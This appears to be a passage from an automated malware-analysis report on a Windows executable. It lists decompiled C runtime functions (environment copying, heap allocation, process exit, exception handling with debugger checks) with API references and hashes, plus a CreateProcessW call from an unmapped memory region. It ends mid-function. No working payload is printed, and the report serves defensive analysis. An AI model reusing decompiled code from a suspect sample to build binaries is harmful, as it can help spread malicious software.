                                                  • String ID: $#$$$$$($($($*$*$*$*$*$*$*$*$+$+$+$-$0$0$0$0$0$2$2$2$2$2$2$3$3$3$3$3$4$4$4$4$7$8$;$;$<$<$>$@$@$@$@$@$@$@$@$A$C$D$D$E$E$E$E$E$E$E$E$E$E$E$F$F$F$G$H$H$M$M$N$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$S$S$S$S$S$S$S$S$S$S$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$X$Y$Y$[$[$\$]$]$]$]$]$^$^$^$^$_$_$_$`$`$a$d$h$h$h$h$h$h$h$h$h$h$h$h$i$j$j$j$j$j$k$p$r$r$r$t$t$t$t$u$u$u$u$u$u$u$u$u$u$w$x$y$}$}$~$~$~$~
                                                  • API String ID: 3628731030-2268195919
                                                  • Opcode ID: 8e0241acf7a294384d3ce4bb1549e457520cc34aa517cd04f55dd8590b393dbd
                                                  • Instruction ID: 31b66af868a262d95fba05b89562bc200a0a12a7ff42e8732463a86f9bc14e1e
                                                  • Opcode Fuzzy Hash: 8e0241acf7a294384d3ce4bb1549e457520cc34aa517cd04f55dd8590b393dbd
                                                  • Instruction Fuzzy Hash: FDC2682090CBE9C9DB32C67C8C5C7CDAE611B27325F5843D9D1E82A2D2C7B50B85DB66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 021F1022
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: D
                                                  • API String ID: 963392458-2746444292
                                                  • Opcode ID: 4a41d18c70f7584a492693245e1824a39ef32eea3cfcf2ef9dfb78456a71ee65
                                                  • Instruction ID: 6a1580cb2306a3c3c640e28e70349a45e4c8ae4f41e52ddf483843e888253f36
                                                  • Opcode Fuzzy Hash: 4a41d18c70f7584a492693245e1824a39ef32eea3cfcf2ef9dfb78456a71ee65
                                                  • Instruction Fuzzy Hash: AD02F370E40219EFDF94DF94C985BADBBB5BF08305F244059E629EB295D770AA81CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			void* E004080ED() {
                                                  				void* _t3;
                                                  				long _t11;
                                                  				void* _t16;
                                                  				WCHAR* _t17;
                                                  
                                                  				// Fetch the process environment block (wide-char, double-NUL terminated)
                                                  				_t17 = GetEnvironmentStringsW();
                                                  				if(_t17 != 0) {
                                                  					// Length of the block in bytes (E004080B6 locates its end), rounded down to an even count
                                                  					_t11 = E004080B6(_t17) - _t17 & 0xfffffffe;
                                                  					// Heap allocation of that size (E004067AF wraps RtlAllocateHeap, see its listing below)
                                                  					_t3 = E004067AF(E004080B6(_t17) - _t17 & 0xfffffffe); // executed
                                                  					_t16 = _t3;
                                                  					if(_t16 != 0) {
                                                  						// Copy _t11 bytes of the environment block into the new buffer
                                                  						E0040DE00(_t16, _t17, _t11);
                                                  					}
                                                  					E00406775(0);
                                                  					// Release the system-owned copy; the heap copy is returned to the caller
                                                  					FreeEnvironmentStringsW(_t17);
                                                  				} else {
                                                  					_t16 = 0;
                                                  				}
                                                  				return _t16;
                                                  			}

                                                  Instruction addresses for the listing above (one entry per line of the C code):
                                                  0x004080f7, 0x004080fb, 0x0040810c, 0x00408110, 0x00408115, 0x0040811b, 0x00408120, 0x00408125, 0x0040812a, 0x00408131, 0x004080fd, 0x004080fd, 0x004080fd, 0x0040813c

                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 004080F1
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00408131
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: EnvironmentStrings$Free
                                                  • String ID:
                                                  • API String ID: 3328510275-0
                                                  • Opcode ID: 35b664fad9df685f0dbcbf31e3ebc8cc5d6ebd4fc4bcbce79b762b4b6627fa65
                                                  • Instruction ID: a59313a91162718aea012b73c5a2a787e2eb3159f4801818b104ec43d02cfe25
                                                  • Opcode Fuzzy Hash: 35b664fad9df685f0dbcbf31e3ebc8cc5d6ebd4fc4bcbce79b762b4b6627fa65
                                                  • Instruction Fuzzy Hash: 81E0E53720492026D2212336BE8A96B1959CFD1779726013EF0557A2C2EE3D4C0700F9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ExitProcess.KERNEL32(00000000,00034988,00034988,00034988), ref: 021F0BA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: e90ae6141465c8cd53c470e3aa9b2636298d93ba400dd60d3e5031b1c6a249cc
                                                  • Instruction ID: 82c4cf6ba9851e85c7ad49c7c41175780b823d543af17228f0ee3ed736cc51fc
                                                  • Opcode Fuzzy Hash: e90ae6141465c8cd53c470e3aa9b2636298d93ba400dd60d3e5031b1c6a249cc
                                                  • Instruction Fuzzy Hash: 5631E319A94348A9DB90DBE8F851BBDB7B2AF48B10F205407E908EE2E0E3710D90D759
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406841(signed int _a4, signed int _a8) {
                                                  				void* _t8;
                                                  				signed int _t13;
                                                  				signed int _t18;
                                                  				long _t19;
                                                  
                                                  				_t18 = _a4;
                                                  				if(_t18 == 0) {
                                                  					L2:
                                                  					_t19 = _t18 * _a8;
                                                  					if(_t19 == 0) {
                                                  						_t19 = _t19 + 1;
                                                  					}
                                                  					while(1) {
                                                  						_t8 = RtlAllocateHeap( *0x4163f0, 8, _t19); // executed
                                                  						if(_t8 != 0) {
                                                  							break;
                                                  						}
                                                  						__eflags = E00406206();
                                                  						if(__eflags == 0) {
                                                  							L8:
                                                  							 *((intOrPtr*)(E00407254(__eflags))) = 0xc;
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						__eflags = E004093BC(__eflags, _t19);
                                                  						if(__eflags == 0) {
                                                  							goto L8;
                                                  						}
                                                  					}
                                                  					return _t8;
                                                  				}
                                                  				_t13 = 0xffffffe0;
                                                  				if(_t13 / _t18 < _a8) {
                                                  					goto L8;
                                                  				}
                                                  				goto L2;
                                                  			}

                                                  Instruction addresses for the listing above (one entry per line of the C code; 0x00000000 where the line has no address):
                                                  0x00406847, 0x0040684c, 0x0040685a, 0x0040685a, 0x00406860, 0x00406862, 0x00406862, 0x00406879, 0x00406882, 0x0040688a, 0x00000000, 0x00000000, 0x0040686a, 0x0040686c, 0x0040688e, 0x00406893, 0x00406899, 0x00000000, 0x00406899, 0x00406875, 0x00406877, 0x00000000, 0x00000000, 0x00406877, 0x00000000, 0x00406879, 0x00406852, 0x00406858, 0x00000000, 0x00000000, 0x00000000

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00406E01,00000001,00000364,00000006,000000FF,?,00407259,0040A127,?,0040995E,?,00000000), ref: 00406882
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 15ac06341d1869c5be9bff9d4644510d53000bf7317bbfad6e4d18ac7378520f
                                                  • Instruction ID: 78d63908047c3f24501b1a4ea29e74f0f9c2a09df36e1c5a4b76806daf35d19b
                                                  • Opcode Fuzzy Hash: 15ac06341d1869c5be9bff9d4644510d53000bf7317bbfad6e4d18ac7378520f
                                                  • Instruction Fuzzy Hash: 31F02B3310212866DF203A234C04A5B3759AB413A0B07C13BFC0AB62C0CA38DC3082E9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004067AF(long _a4) {
                                                  				void* _t4;
                                                  				long _t8;
                                                  
                                                  				_t8 = _a4;
                                                  				if(_t8 > 0xffffffe0) {
                                                  					L7:
                                                  					 *((intOrPtr*)(E00407254(__eflags))) = 0xc;
                                                  					__eflags = 0;
                                                  					return 0;
                                                  				}
                                                  				if(_t8 == 0) {
                                                  					_t8 = _t8 + 1;
                                                  				}
                                                  				while(1) {
                                                  					_t4 = RtlAllocateHeap( *0x4163f0, 0, _t8); // executed
                                                  					if(_t4 != 0) {
                                                  						break;
                                                  					}
                                                  					__eflags = E00406206();
                                                  					if(__eflags == 0) {
                                                  						goto L7;
                                                  					}
                                                  					__eflags = E004093BC(__eflags, _t8);
                                                  					if(__eflags == 0) {
                                                  						goto L7;
                                                  					}
                                                  				}
                                                  				return _t4;
                                                  			}

                                                  Instruction addresses for the listing above (one entry per line of the C code; 0x00000000 where the line has no address):
                                                  0x004067b5, 0x004067bb, 0x004067ed, 0x004067f2, 0x004067f8, 0x00000000, 0x004067f8, 0x004067bf, 0x004067c1, 0x004067c1, 0x004067d8, 0x004067e1, 0x004067e9, 0x00000000, 0x00000000, 0x004067c9, 0x004067cb, 0x00000000, 0x00000000, 0x004067d4, 0x004067d6, 0x00000000, 0x00000000, 0x004067d6, 0x00000000

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,00407B24,00000220,0040AB94,00013385,?,?,?,?,00000000,00000000,?,0040AB94), ref: 004067E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 30fda3e37de4168e2b8e0ad8256daa5e76d800d04225ae53f2deb7e3a4c774a7
                                                  • Instruction ID: 762a3af8c05f0e7ef54fdd193b519057992b4ac8f70cd6ff9e57b4ff61155e15
                                                  • Opcode Fuzzy Hash: 30fda3e37de4168e2b8e0ad8256daa5e76d800d04225ae53f2deb7e3a4c774a7
                                                  • Instruction Fuzzy Hash: 39E0392110022196EA312A6A9C00B5BB6989F457A8F17417BAC17B76D1DB39DC2582AE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 76%
                                                  			E00406EB1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				char _v0;
                                                  				signed int _v8;
                                                  				intOrPtr _v524;
                                                  				intOrPtr _v528;
                                                  				void* _v532;
                                                  				intOrPtr _v536;
                                                  				char _v540;
                                                  				intOrPtr _v544;
                                                  				intOrPtr _v548;
                                                  				intOrPtr _v552;
                                                  				intOrPtr _v556;
                                                  				intOrPtr _v560;
                                                  				intOrPtr _v564;
                                                  				intOrPtr _v568;
                                                  				intOrPtr _v572;
                                                  				intOrPtr _v576;
                                                  				intOrPtr _v580;
                                                  				intOrPtr _v584;
                                                  				char _v724;
                                                  				intOrPtr _v792;
                                                  				intOrPtr _v800;
                                                  				char _v804;
                                                  				struct _EXCEPTION_POINTERS _v812;
                                                  				signed int _t40;
                                                  				char* _t47;
                                                  				char* _t49;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t66;
                                                  				intOrPtr _t67;
                                                  				int _t68;
                                                  				intOrPtr _t69;
                                                  				signed int _t70;
                                                  
                                                  				_t69 = __esi;
                                                  				_t67 = __edi;
                                                  				_t66 = __edx;
                                                  				_t61 = __ebx;
                                                  				_t40 =  *0x4150a8; // 0x90cea005
                                                  				_t41 = _t40 ^ _t70;
                                                  				_v8 = _t40 ^ _t70;
                                                  				if(_a4 != 0xffffffff) {
                                                  					_push(_a4);
                                                  					E00403066(_t41);
                                                  					_pop(_t62);
                                                  				}
                                                  				E00404E20(_t67,  &_v804, 0, 0x50);
                                                  				E00404E20(_t67,  &_v724, 0, 0x2cc);
                                                  				_v812.ExceptionRecord =  &_v804;
                                                  				_t47 =  &_v724;
                                                  				_v812.ContextRecord = _t47;
                                                  				_v548 = _t47;
                                                  				_v552 = _t62;
                                                  				_v556 = _t66;
                                                  				_v560 = _t61;
                                                  				_v564 = _t69;
                                                  				_v568 = _t67;
                                                  				_v524 = ss;
                                                  				_v536 = cs;
                                                  				_v572 = ds;
                                                  				_v576 = es;
                                                  				_v580 = fs;
                                                  				_v584 = gs;
                                                  				asm("pushfd");
                                                  				_pop( *_t22);
                                                  				_v540 = _v0;
                                                  				_t49 =  &_v0;
                                                  				_v528 = _t49;
                                                  				_v724 = 0x10001;
                                                  				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                  				_v804 = _a8;
                                                  				_v800 = _a12;
                                                  				_v792 = _v0;
                                                  				_t68 = IsDebuggerPresent();
                                                  				SetUnhandledExceptionFilter(0);
                                                  				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                  					_push(_a4);
                                                  					E00403066(_t57);
                                                  				}
                                                  				return E004032D1(_v8 ^ _t70);
                                                   			}

                                                   Instruction addresses: 0x00406eb1, 0x00406eb1, 0x00406eb1, 0x00406eb1, 0x00406ebc, 0x00406ec1, 0x00406ec3, 0x00406ecb, 0x00406ecd, 0x00406ed0, 0x00406ed5, 0x00406ed5, 0x00406ee1, 0x00406ef4, 0x00406f02, 0x00406f08, 0x00406f0e, 0x00406f14, 0x00406f1a, 0x00406f20, 0x00406f26, 0x00406f2c, 0x00406f32, 0x00406f38, 0x00406f3f, 0x00406f46, 0x00406f4d, 0x00406f54, 0x00406f5b, 0x00406f62, 0x00406f63, 0x00406f6c, 0x00406f72, 0x00406f75, 0x00406f7b, 0x00406f88, 0x00406f91, 0x00406f9a, 0x00406fa3, 0x00406fb1, 0x00406fb3, 0x00406fc8, 0x00406fd4, 0x00406fd7, 0x00406fdc, 0x00406fe9

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00406FA9
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00406FB3
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00406FC0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: cfdfdaa980b2c8f8b4498b8ea93c8823796d26ade8959c49497f6c156e6eb6de
                                                  • Instruction ID: 09632b23e9535b980bc8f7a85c71ec744b71ac0eb0a32a2fcbdda27ffbcea58f
                                                  • Opcode Fuzzy Hash: cfdfdaa980b2c8f8b4498b8ea93c8823796d26ade8959c49497f6c156e6eb6de
                                                  • Instruction Fuzzy Hash: DC31C47490122DABCB21DF69D98978DBBB8BF08310F5041EAE41CA7291E7749B858F48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405F4E(int _a4) {
                                                  				void* _t14;
                                                  
                                                  				if(E004081DD(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                  					TerminateProcess(GetCurrentProcess(), _a4);
                                                  				}
                                                  				E00405FD3(_t14, _a4);
                                                  				ExitProcess(_a4);
                                                   			}

                                                   Instruction addresses: 0x00405f5b, 0x00405f77, 0x00405f77, 0x00405f80, 0x00405f89

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00405F4D,?,?,?,?,?,0040B43A), ref: 00405F70
                                                  • TerminateProcess.KERNEL32(00000000,?,00405F4D,?,?,?,?,?,0040B43A), ref: 00405F77
                                                  • ExitProcess.KERNEL32 ref: 00405F89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 21e83ba028ebd328a0306f7a536238031a44e991cb9e96e2072dab9d8e7e9eb6
                                                  • Instruction ID: 3ec9165c1a7b9fd2a44475ee1879d8c1c75524540a3bab13d7ffc46ad0439681
                                                  • Opcode Fuzzy Hash: 21e83ba028ebd328a0306f7a536238031a44e991cb9e96e2072dab9d8e7e9eb6
                                                  • Instruction Fuzzy Hash: 3AE0BF31004508ABCB216B65DE09E4A3B69EF40781B504435F909A6A72DB3DDD46DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040D3BD(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                  				signed int _t172;
                                                  				signed int _t175;
                                                  				signed int _t178;
                                                  				signed int* _t179;
                                                  				signed char _t193;
                                                  				signed int _t196;
                                                  				signed int _t200;
                                                  				signed int _t203;
                                                  				void* _t204;
                                                  				void* _t207;
                                                  				signed int _t210;
                                                  				void* _t211;
                                                  				signed int _t226;
                                                  				unsigned int* _t241;
                                                  				signed char _t243;
                                                  				signed int* _t251;
                                                  				unsigned int* _t257;
                                                  				signed int* _t258;
                                                  				signed char _t260;
                                                  				long _t263;
                                                  				signed int* _t266;
                                                  
                                                  				 *(_a4 + 4) = 0;
                                                  				_t263 = 0xc000000d;
                                                  				 *(_a4 + 8) = 0;
                                                  				 *(_a4 + 0xc) = 0;
                                                  				_t243 = _a12;
                                                  				if((_t243 & 0x00000010) != 0) {
                                                  					_t263 = 0xc000008f;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                  				}
                                                  				if((_t243 & 0x00000002) != 0) {
                                                  					_t263 = 0xc0000093;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                  				}
                                                  				if((_t243 & 0x00000001) != 0) {
                                                  					_t263 = 0xc0000091;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                  				}
                                                  				if((_t243 & 0x00000004) != 0) {
                                                  					_t263 = 0xc000008e;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                  				}
                                                  				if((_t243 & 0x00000008) != 0) {
                                                  					_t263 = 0xc0000090;
                                                  					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                  				}
                                                  				_t266 = _a8;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                  				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
                                                  				_t260 = E0040B7D4(_a4);
                                                  				if((_t260 & 0x00000001) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                  				}
                                                  				if((_t260 & 0x00000004) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                  				}
                                                  				if((_t260 & 0x00000008) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                  				}
                                                  				if((_t260 & 0x00000010) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                  				}
                                                  				if((_t260 & 0x00000020) != 0) {
                                                  					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                  				}
                                                  				_t172 =  *_t266 & 0x00000c00;
                                                  				if(_t172 == 0) {
                                                  					 *_a4 =  *_a4 & 0xfffffffc;
                                                  				} else {
                                                  					if(_t172 == 0x400) {
                                                  						_t258 = _a4;
                                                  						_t226 =  *_t258 & 0xfffffffd | 1;
                                                  						L26:
                                                  						 *_t258 = _t226;
                                                  						L29:
                                                  						_t175 =  *_t266 & 0x00000300;
                                                  						if(_t175 == 0) {
                                                  							_t251 = _a4;
                                                  							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
                                                  							L35:
                                                  							 *_t251 = _t178;
                                                  							L36:
                                                  							_t179 = _a4;
                                                  							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                  							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                  							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                  							if(_a28 == 0) {
                                                  								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                  								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                  								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                  								_t255 = _a4;
                                                  								_t241 = _a24;
                                                  								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                  								 *(_a4 + 0x50) =  *_t241;
                                                  							} else {
                                                  								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                  								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                  								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                  								_t241 = _a24;
                                                  								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                  								 *(_a4 + 0x50) =  *_t241;
                                                  							}
                                                  							E0040B740(_t255);
                                                  							RaiseException(_t263, 0, 1,  &_a4);
                                                  							_t257 = _a4;
                                                  							_t193 = _t257[2];
                                                  							if((_t193 & 0x00000010) != 0) {
                                                  								 *_t266 =  *_t266 & 0xfffffffe;
                                                  								_t193 = _t257[2];
                                                  							}
                                                  							if((_t193 & 0x00000008) != 0) {
                                                  								 *_t266 =  *_t266 & 0xfffffffb;
                                                  								_t193 = _t257[2];
                                                  							}
                                                  							if((_t193 & 0x00000004) != 0) {
                                                  								 *_t266 =  *_t266 & 0xfffffff7;
                                                  								_t193 = _t257[2];
                                                  							}
                                                  							if((_t193 & 0x00000002) != 0) {
                                                  								 *_t266 =  *_t266 & 0xffffffef;
                                                  								_t193 = _t257[2];
                                                  							}
                                                  							if((_t193 & 0x00000001) != 0) {
                                                  								 *_t266 =  *_t266 & 0xffffffdf;
                                                  							}
                                                  							_t196 =  *_t257 & 0x00000003;
                                                  							if(_t196 == 0) {
                                                  								 *_t266 =  *_t266 & 0xfffff3ff;
                                                  							} else {
                                                  								_t207 = _t196 - 1;
                                                  								if(_t207 == 0) {
                                                  									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
                                                  									L55:
                                                  									 *_t266 = _t210;
                                                  									L58:
                                                  									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
                                                  									if(_t200 == 0) {
                                                  										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
                                                  										L64:
                                                  										 *_t266 = _t203;
                                                  										L65:
                                                  										if(_a28 == 0) {
                                                  											 *_t241 = _t257[0x14];
                                                  										} else {
                                                  											 *_t241 = _t257[0x14];
                                                  										}
                                                  										return _t203;
                                                  									}
                                                  									_t204 = _t200 - 1;
                                                  									if(_t204 == 0) {
                                                  										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
                                                  										goto L64;
                                                  									}
                                                  									_t203 = _t204 - 1;
                                                  									if(_t203 == 0) {
                                                  										 *_t266 =  *_t266 & 0xfffff3ff;
                                                  									}
                                                  									goto L65;
                                                  								}
                                                  								_t211 = _t207 - 1;
                                                  								if(_t211 == 0) {
                                                  									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
                                                  									goto L55;
                                                  								}
                                                  								if(_t211 == 1) {
                                                  									 *_t266 =  *_t266 | 0x00000c00;
                                                  								}
                                                  							}
                                                  							goto L58;
                                                  						}
                                                  						if(_t175 == 0x200) {
                                                  							_t251 = _a4;
                                                  							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
                                                  							goto L35;
                                                  						}
                                                  						if(_t175 == 0x300) {
                                                  							 *_a4 =  *_a4 & 0xffffffe3;
                                                  						}
                                                  						goto L36;
                                                  					}
                                                  					if(_t172 == 0x800) {
                                                  						_t258 = _a4;
                                                  						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
                                                  						goto L26;
                                                  					}
                                                  					if(_t172 == 0xc00) {
                                                  						 *_a4 =  *_a4 | 0x00000003;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0040D3B8,?,?,00000008,?,?,0040D050,00000000), ref: 0040D5EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: e0f9336bebe1e3d867682b60c19978c96fb30653c259e267145ce86a714db47e
                                                  • Instruction ID: c48f4946aa00f937ced3af1211726b86c54a52d5fb05354a7db4d568b0c1098d
                                                  • Opcode Fuzzy Hash: e0f9336bebe1e3d867682b60c19978c96fb30653c259e267145ce86a714db47e
                                                  • Instruction Fuzzy Hash: 9DB15D31610604DFD714CF68C48AB657BA0FF45364F258669E89ADF3E1C33AE986CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E004074A7(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				signed int _v12;
                                                  				intOrPtr* _v28;
                                                  				signed short* _v32;
                                                  				WCHAR* _v36;
                                                  				signed int _v48;
                                                  				intOrPtr _v556;
                                                  				intOrPtr _v558;
                                                  				struct _WIN32_FIND_DATAW _v604;
                                                  				char _v605;
                                                  				intOrPtr* _v612;
                                                  				signed int _v616;
                                                  				signed int _v620;
                                                  				intOrPtr _v648;
                                                  				intOrPtr _t42;
                                                  				void* _t47;
                                                  				signed int _t50;
                                                  				signed char _t52;
                                                  				intOrPtr* _t58;
                                                  				union _FINDEX_INFO_LEVELS _t60;
                                                  				int _t65;
                                                  				void* _t80;
                                                  				void* _t82;
                                                  				void* _t86;
                                                  				WCHAR* _t87;
                                                  				void* _t89;
                                                  				intOrPtr* _t92;
                                                  				intOrPtr _t95;
                                                  				intOrPtr* _t98;
                                                  				void* _t103;
                                                  				void* _t111;
                                                  				signed short* _t112;
                                                  				signed int _t118;
                                                  				intOrPtr _t122;
                                                  				void* _t125;
                                                  				void* _t127;
                                                  				void* _t132;
                                                  				signed int _t133;
                                                  				void* _t134;
                                                  
                                                  				_push(__ecx);
                                                  				_t92 = _a4;
                                                  				_push(__ebx);
                                                  				_push(__edi);
                                                  				_t2 = _t92 + 2; // 0x2
                                                  				_t111 = _t2;
                                                  				do {
                                                  					_t42 =  *_t92;
                                                  					_t92 = _t92 + 2;
                                                  				} while (_t42 != 0);
                                                  				_t118 = _a12;
                                                  				_t95 = (_t92 - _t111 >> 1) + 1;
                                                  				_v8 = _t95;
                                                  				if(_t95 <=  !_t118) {
                                                  					_push(__esi);
